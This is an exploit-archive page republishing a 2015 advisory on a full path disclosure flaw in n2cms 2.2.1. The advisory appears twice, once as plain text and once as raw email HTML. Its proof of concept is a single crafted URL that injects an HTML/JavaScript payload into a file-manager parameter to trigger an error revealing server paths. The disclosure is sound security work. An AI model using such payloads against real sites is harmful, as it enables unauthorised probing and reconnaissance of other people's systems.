exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

n2cms 2.2.1 Path Disclosure

n2cms 2.2.1 Path Disclosure
Posted May 7, 2015
Authored by Provensec

n2cms version 2.2.1 suffers from a path disclosure vulnerability.

tags | exploit
SHA-256 | 3999ea7bf894cbb36512a747568273dd9e6751f2d406d253df2dbab8f24da389

n2cms 2.2.1 Path Disclosure

Change Mirror Download
# Affected software: n2cms
# Type of vulnerability:full path disclosure
# URL:n2cms.com
# Discovered by: provensec
# Website: provensec.com

#version: *2.2.1* <http://n2cms.codeplex.com/releases>
# Proof of concept

http://demo.n2cms.com/N2/Files/FileSystem/File.aspx?selected=%2fupload%2f%22%3E%3Cimg%20src=d%20onerror=confirm(1);%3E1.php%2f




manipulating the selected paramter will splash error which discloses system
path

--047d7bd6bb5a40b6a5051578e115
Content-Type: text/html; charset=ISO-8859-1
Content-Transfer-Encoding: quoted-printable

<div dir=3D"ltr"><div class=3D"gmail_default" style><span style=3D"font-fam=
ily:'comic sans ms',sans-serif"></span><font face=3D"comic sans ms,=
sans-serif"># Affected software: n2cms</font></div><div class=3D"gmail_def=
ault" style><font face=3D"comic sans ms, sans-serif"># Type of vulnerabilit=
y:full path disclosure</font></div><div class=3D"gmail_default" style><font=
face=3D"comic sans ms, sans-serif"># URL:<a href=3D"http://n2cms.com">n2cm=
s.com</a></font></div><div class=3D"gmail_default" style><font face=3D"comi=
c sans ms, sans-serif"># Discovered by: provensec</font></div><div class=3D=
"gmail_default" style><font face=3D"comic sans ms, sans-serif"># Website: <=
a href=3D"http://provensec.com">provensec.com</a></font></div><div class=3D=
"gmail_default" style><font face=3D"comic sans ms, sans-serif"><br></font><=
/div><div class=3D"gmail_default" style><font face=3D"comic sans ms, sans-s=
erif">#version:=A0</font><a href=3D"http://n2cms.codeplex.com/releases" sty=
le=3D"color:rgb(0,150,219);text-decoration:none;font-family:Georgia,serif;f=
ont-size:14.3999996185303px"><strong>2.2.1</strong></a><span style=3D"color=
:rgb(51,51,51);font-family:Georgia,serif;font-size:14.3999996185303px">=A0<=
/span></div><div class=3D"gmail_default" style><font face=3D"comic sans ms,=
sans-serif"># Proof of concept</font><span style=3D"font-family:'comic=
sans ms',sans-serif"></span></div><div class=3D"gmail_default" style><=
span style=3D"font-family:'comic sans ms',sans-serif"><br></span></=
div><div class=3D"gmail_default" style><font face=3D"comic sans ms, sans-se=
rif"><a href=3D"http://demo.n2cms.com/N2/Files/FileSystem/File.aspx?selecte=
d=3D%2fupload%2f%22%3E%3Cimg%20src=3Dd%20onerror=3Dconfirm(1);%3E1.php%2f">=
http://demo.n2cms.com/N2/Files/FileSystem/File.aspx?selected=3D%2fupload%2f=
%22%3E%3Cimg%20src=3Dd%20onerror=3Dconfirm(1);%3E1.php%2f</a><br></font><br=
><br></div><div class=3D"gmail_default" style><br></div><div class=3D"gmail=
_default" style><br>manipulating the selected paramter will splash error wh=
ich discloses system path=A0</div><div class=3D"gmail_default" style><br></=
div><div class=3D"gmail_default" style>=A0</div></div>

Login or Register to add favorites

File Archive:

May 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    May 1st
    44 Files
  • 2
    May 2nd
    5 Files
  • 3
    May 3rd
    11 Files
  • 4
    May 4th
    0 Files
  • 5
    May 5th
    0 Files
  • 6
    May 6th
    0 Files
  • 7
    May 7th
    0 Files
  • 8
    May 8th
    0 Files
  • 9
    May 9th
    0 Files
  • 10
    May 10th
    0 Files
  • 11
    May 11th
    0 Files
  • 12
    May 12th
    0 Files
  • 13
    May 13th
    0 Files
  • 14
    May 14th
    0 Files
  • 15
    May 15th
    0 Files
  • 16
    May 16th
    0 Files
  • 17
    May 17th
    0 Files
  • 18
    May 18th
    0 Files
  • 19
    May 19th
    0 Files
  • 20
    May 20th
    0 Files
  • 21
    May 21st
    0 Files
  • 22
    May 22nd
    0 Files
  • 23
    May 23rd
    0 Files
  • 24
    May 24th
    0 Files
  • 25
    May 25th
    0 Files
  • 26
    May 26th
    0 Files
  • 27
    May 27th
    0 Files
  • 28
    May 28th
    0 Files
  • 29
    May 29th
    0 Files
  • 30
    May 30th
    0 Files
  • 31
    May 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close